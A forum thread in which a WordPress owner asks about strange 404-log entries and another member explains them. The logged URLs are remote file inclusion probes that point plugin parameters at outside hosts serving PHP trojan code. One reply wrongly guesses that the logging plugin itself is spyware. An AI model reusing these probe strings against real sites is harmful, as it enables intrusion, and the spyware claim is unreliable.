Designer? Programmer? Enthusiast? Join Open Designs Now!

Open Designs Forum » Designer Talk

weird 404 errors in wordpress

(9 posts)

Tags:

  1. ricardo
    Member

    hi everyone, just instaled a 404 error log plugin in wordpress to see which urls arent working, so far so good,,,but now i noticed some urls that i cant understand where they comong from or how people/bots are able to get that url

    Examples:

    /2008////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fuzewire.com/intranet/data/default/id??

    ////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fuzewire.com/intranet/data/default/id??

    /2008/05////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fuzewire.com/intranet/data/default/id??

    /2009/06/video-guia-%E2%80%93-como-instalar-e-testar-o-wordpress-no-computador.html//plugins/wp-table/js/wptable-button.phpp?wpPATH=http://zipclube.com/tepos/idfx1.txt??

    /2009//Archive.php?bkpwp_plugin_path=http://zipclube.com/tepos/idfx1.txt??

    /2009/06//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg???

    theres lots of them, what are they?

    Thanks

    Posted 2 years ago #

  2. pseudoxiah
    Member

    You're hosting it on a free service, right?

    Posted 2 years ago #

  3. ricardo
    Member

    Hi Pseudoxiah, im paying for it, itj just weird because some of those directories are not present on my wordpress instalation...so how can someone click on a url to there?

    look at this one:
    /2009/06/wp-pass.php?_wp_http_referer=http://muksang.net/bbs/icon/id1.txt???

    if i add that to my blog url i go to page 404, how on eart did they get there...and wp-pass.php seems like someone is trying to hack my account.

    Anyone know what on earth this is?

    Posted 2 years ago #

  4. pseudoxiah
    Member

    If you split the link in two you can isolate this one:

    http://muksang.net/bbs/icon/id1.txt???

    If you view it in a browser you get a php source code. One of the lines says;

    echo "0sirys was here and also is a fucking gay..<br />";

    So, yes it looks like someone is trying to infiltrate. Luckily he seems kinda gay :)
    I recommend you back-up your database and do a clean wp installation after changing your login information.
    Edit: If I execute that code I get a trojan horse warning.

    Posted 2 years ago #

  5. ricardo
    Member

    yes...i saw that one, i bacukup my database via email everyday...just wondering if this is a normal behaviour i should expectt on wordpress... should i be worried? or are those logs (some of them) showing hacking attempts...my wordpress instalation is up to date....

    Thanks for whatever advice you can spare

    Posted 2 years ago #

  6. pseudoxiah
    Member

    I don't think you got me. That plugin you installed may be some spyware that tries to send your personal information, including login information, to third parties. That's why you got all those weird links in the urls. Having the latest wp installation won't help, wp is not antispware.

    Change login information, delete everyting, do a fresh install and restore from a backup before you installed that plugin.

    Posted 2 years ago #

  7. ricardo
    Member

    this is the plugin i installed:

    http://wordpress.org/extend/plugins/jh-404-logger/

    since its in the wordpress repository i thought it was safe, how will i know this plugin is the one detecting the hackers and not a spyware plugin? I can uninstall and do fresh instalation but it could be another one.

    Grrrrrrr glad i asked here...i wasnt going to bother but now im "worried"

    Posted 2 years ago #

  8. pseudoxiah
    Member

    You can look at the source code. Either directly inside the archive or from the wp backend.

    If not sure either if it's that plugin or something else, however that behavior is not normal.

    From the description it says it just shows a list of recent 404 hits. The intention is to inform you which links are unavailable and it does not create those links itself.

    Most probably someone is trying to attack you with an obsolete script. I'd still change my login information and delete any crapware.

    Posted 2 years ago #

  9. ricardo
    Member

    something tells me that those urls are the ones spam bots use to publish automated comments...i will follow your advice...Thank you very much pseudoxiah

    Posted 2 years ago #

RSS feed for this topic

Reply

You must log in to post.